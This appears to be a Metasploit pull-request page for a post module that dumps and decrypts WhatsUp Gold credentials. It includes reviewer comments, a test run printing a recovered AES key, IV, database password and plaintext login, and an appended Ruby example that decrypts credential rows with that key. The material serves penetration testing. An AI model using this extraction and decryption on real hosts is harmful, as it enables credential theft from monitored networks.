Add whatsupgold_credential_dump post module
Add a post module for credential extraction from WhatsUp Gold instances on Windows hosts. The module should theoretically decrypt ciphertext from any version of WhatsUp Gold, although it has only been verified working on WhatsUp Gold versions 11.0 through 22.0.
@bwatters-r7 good afternoon! Just pushed a commit that should hopefully address the issues you brought up. I was not able to totally abandon the way the registry keys are queried (mostly because registry_key_exist? does not seem to take a view argument) but have at least added sanity so now the module only checks SysWOW64 if the arch is detected 64-bit. Let me know if I need to refine anything else!
Just submitted a PR to your branch for the suggested changes
Tested the changes, and it works great! Thanks, will get this landed soon!
Test output
msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > run
[*] Hostname DESKTOP-5JSUGC8 IPv4 192.168.140.150
[*] WhatsUp Gold Build 22.1.39
[*] Init WhatsUp Gold crypto ...
[+] WhatsUp Gold Serial Number: 758ND8MHRFJAYC2
[+] WhatsUp Gold Dynamic Encryption Salt
[+] HEX: 79EA6EE2974301E3
[+] WhatsUp Gold Composed AES256
[+] KEY: 2DB8BFB24B65E6D174F36AD336A9EB504F473A95F72124FFA63DE32820C199CF
[+] IV: E885F00E24FAB2A41620A4514D025AD5
[*] Init WhatsUp Gold SQL ...
[+] WhatsUp Gold SQL Database Connection Configuration:
[+] Instance Name: DESKTOP-5JSUGC8\WHATSUP
[+] Database Name: WhatsUp
[+] Database User: WhatsUpGold_DESKTOP-5JSUGC8
[+] Database Pass: 0x!19NpaffeL1GMdy2FtlfUX3
[*] Performing export of WhatsUp Gold SQL database to CSV file
[*] Export WhatsUp Gold DB ...
[+] 3 WUG rows exported, 2 unique nCredentialTypeIDs
[+] Encrypted WhatsUp Gold Database Dump: /Users/space/.msf4/loot/20230317163237_default_192.168.140.150_whatsup_gold_enc_652441.txt
[*] Performing decryption of WhatsUp Gold SQL database
[+] 3 WUG rows loaded, 2 unique nCredentialTypeIDs
[*] Process WhatsUp Gold DB ...
[+] 3 WUG rows processed
[*] 3 rows recovered: 2 plaintext, 1 decrypted (0 blank)
[*] 3 rows written (0 blank rows withheld)
[+] 2 unique WUG nCredentialTypeID records recovered
[+] Recovered Credential: test
[+] L: DESKTOP-5JSUGC8\test
[+] P: S3cureP@ssword
[+] Decrypted WhatsUp Gold Database Dump: /Users/space/.msf4/loot/20230317163237_default_192.168.140.150_whatsup_gold_dec_517184.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > creds
Credentials
===========
host             origin           service           public                                private                                                           realm                    private_type        JtR Format
----             ------           -------           ------                                -------                                                           -----                    ------------        ----------
                                                    WhatsUp Gold Composed AES256 IV       E885F00E24FAB2A41620A4514D025AD5                                                           Nonreplayable hash
                                                    WhatsUp Gold Composed AES256 key      2DB8BFB24B65E6D174F36AD336A9EB504F473A95F72124FFA63DE32820C199CF                           Nonreplayable hash
                                                    WhatsUp Gold Dynamic Encryption Salt  79EA6EE2974301E3                                                                           Nonreplayable hash
192.168.140.150  192.168.140.150  1433/tcp (mssql)  WhatsUpGold_DESKTOP-5JSUGC8           0x!19NpaffeL1GMdy2FtlfUX3                                         DESKTOP-5JSUGC8\WHATSUP  Password
192.168.140.150  192.168.140.150  443/tcp (https)   DESKTOP-5JSUGC8\test                  S3cureP@ssword                                                    test                     Password
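The run above ends with a composed AES-256 key and IV in the loot and a row-level tally (plaintext vs. decrypted vs. blank, plus unique nCredentialTypeIDs). The snippet below is an added example, not the module's code, showing how those recovered key/IV values would be applied offline to a handful of constructed credential rows and how the per-row triage that produces such a tally can be written. It assumes AES-256-CBC with PKCS#7 padding, a hypothetical `enc:` + Base64 encoding to mark an encrypted column value, and generic `:username`/`:password` field names; WhatsUp Gold's real column encoding and key-derivation steps are not described on this page and are not reproduced here.

```ruby
require 'openssl'
require 'base64'

# Key and IV copied from the test output above (hex strings).
WUG_AES_KEY_HEX = '2DB8BFB24B65E6D174F36AD336A9EB504F473A95F72124FFA63DE32820C199CF'
WUG_AES_IV_HEX  = 'E885F00E24FAB2A41620A4514D025AD5'

# ASSUMPTION: the composed key/IV are used as AES-256-CBC with PKCS#7 padding.
def wug_aes_decrypt(ciphertext, key_hex: WUG_AES_KEY_HEX, iv_hex: WUG_AES_IV_HEX)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = [key_hex].pack('H*')  # 32 bytes
  cipher.iv  = [iv_hex].pack('H*')   # 16 bytes
  cipher.update(ciphertext) + cipher.final
end

# Encrypt helper used only to construct sample rows for this example.
def wug_aes_encrypt(plaintext, key_hex: WUG_AES_KEY_HEX, iv_hex: WUG_AES_IV_HEX)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = [key_hex].pack('H*')
  cipher.iv  = [iv_hex].pack('H*')
  cipher.update(plaintext) + cipher.final
end

# ASSUMPTION: an encrypted column value is marked 'enc:' followed by Base64.
# Anything else is treated as stored plaintext; empty values are withheld.
ENC_PREFIX = 'enc:'

def process_rows(rows)
  stats = { plaintext: 0, decrypted: 0, blank: 0, failed: 0, unique_types: 0 }
  recovered = []
  rows.each do |row|
    value = row[:password].to_s
    if value.empty?
      stats[:blank] += 1
      next
    end
    if value.start_with?(ENC_PREFIX)
      begin
        blob = Base64.strict_decode64(value.delete_prefix(ENC_PREFIX))
        pw = wug_aes_decrypt(blob).force_encoding('UTF-8')
        stats[:decrypted] += 1
      rescue OpenSSL::Cipher::CipherError, ArgumentError
        # Wrong key, truncated blob or bad padding: report rather than abort the dump.
        stats[:failed] += 1
        next
      end
    else
      pw = value
      stats[:plaintext] += 1
    end
    recovered << row.merge(password: pw)
  end
  stats[:unique_types] = recovered.map { |r| r[:nCredentialTypeID] }.uniq.size
  [recovered, stats]
end

# Constructed sample rows (not real WhatsUp Gold data). One encrypted with the
# key/IV above, two plaintext, one blank, one with an undecryptable blob.
SAMPLE_ROWS = [
  { nCredentialTypeID: 1, name: 'test',  username: 'DESKTOP-5JSUGC8\\test',
    password: ENC_PREFIX + Base64.strict_encode64(wug_aes_encrypt('S3cureP@ssword')) },
  { nCredentialTypeID: 1, name: 'admin', username: 'DESKTOP-5JSUGC8\\admin', password: 'Winter2023!' },
  { nCredentialTypeID: 2, name: 'snmp',  username: '', password: 'public' },
  { nCredentialTypeID: 2, name: 'empty', username: 'nobody', password: '' },
  { nCredentialTypeID: 3, name: 'broken', username: 'x', password: ENC_PREFIX + 'AAAA' }
].freeze

if $PROGRAM_NAME == __FILE__
  rows, stats = process_rows(SAMPLE_ROWS)
  puts "#{rows.size} rows recovered: #{stats[:plaintext]} plaintext, " \
       "#{stats[:decrypted]} decrypted (#{stats[:blank]} blank, #{stats[:failed]} failed)"
  puts "#{stats[:unique_types]} unique nCredentialTypeID records recovered"
  rows.each { |r| puts "#{r[:name]}: L: #{r[:username]} P: #{r[:password]}" }
end
```

Counting failures separately from blanks matters in practice: a row that will not decrypt under the composed key usually means the key or IV was derived from the wrong install, which is a different problem from an unused credential slot.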
Release Notes
This adds a post module that collects and decrypts credentials from WhatsUp Gold installs.